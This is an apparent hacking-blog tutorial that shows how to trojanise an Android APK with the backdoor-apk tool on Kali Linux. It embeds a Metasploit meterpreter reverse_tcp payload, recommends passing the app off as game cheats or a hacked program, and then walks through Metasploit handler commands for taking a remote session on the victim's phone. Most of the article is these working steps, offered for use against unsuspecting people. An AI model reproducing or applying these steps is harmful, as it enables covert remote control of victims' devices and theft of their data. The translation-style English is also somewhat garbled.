How can any student sew a Trojan into a smartphone app?

How can any student sew a Trojan into a smartphone app?

I am sure your smartphone has more than a dozen different applications. These are messengers, applications for working with documents, games, etc. If you download all of these exclusively from Play Market, then the risk of encountering malware is minimal, although not zero (yes, even there are apps with Trojans).

However, there are also those who download programs from third party sources. In this case, the chance to start a malware attack increases dramatically, because installing the most common payload in apk is not so difficult, and any student can handle it.

I will now demonstrate one of the easiest ways to infect the apk file

We will work for Kali Linux. Also on the Internet full instructions how to install this system on a virtual machine.

We launch Kali, open the terminal and look for updates to start with.

sudo apt update

sudo apt upgrade

After that we will install the necessary components:

sudo apt install smali

sudo apt install apktool

sudo apt-get install lib32stdc++6 lib32z1

Now we clone the repository itself with the github program:

git clone

Go to the right directory:

cd backdoor-apk

cd backdoor-apk (yes, twice)

We will naturally need apk itself, which we will infect. We can find it on pdalife, for example. We download apk and throw it in the same directory (where the file is).

Start the program.

./ original.apk

Say, ./ Drive.apk

It remains to configure the payload parameters.


  • Type first, I chose meterpreter/reverse_tcp
  • Then Your IP (you can find out by spelling the ifconfig command)
  • Also port through which the connection will go (do not forget to open it later)
  • And at the end of the like merge of payload and the original apk. I chose 2 options.

After that the assembly process will start. Example of a successful assembly

Then you can throw this apk under the guise of cheats, hacked version of the game or program and that’s it. However, I will not show you how to do it, so as not to go beyond certain limits.

To connect to the victim, open Metasploit (with the command msfconsole) and prescribe:

use multi/handler

set payload android/meterpreter/reverse_tcp (or the other type of load you selected at the beginning)

set lhost your_IP

In my case: set lhost

set lport 4444


After the victim starts apk, you will have a meterpreter session.

WARNING! All links in the articles may lead to malicious sites or contain viruses. Follow them at your own risk. Those who purposely visit the article know what they are doing. Do not click on everything thoughtlessly.


0 0 vote
Article Rating
Notify of
Inline Feedbacks
View all comments

Do NOT follow this link or you will be banned from the site!
Would love your thoughts, please comment.x

Spelling error report

The following text will be sent to our editors: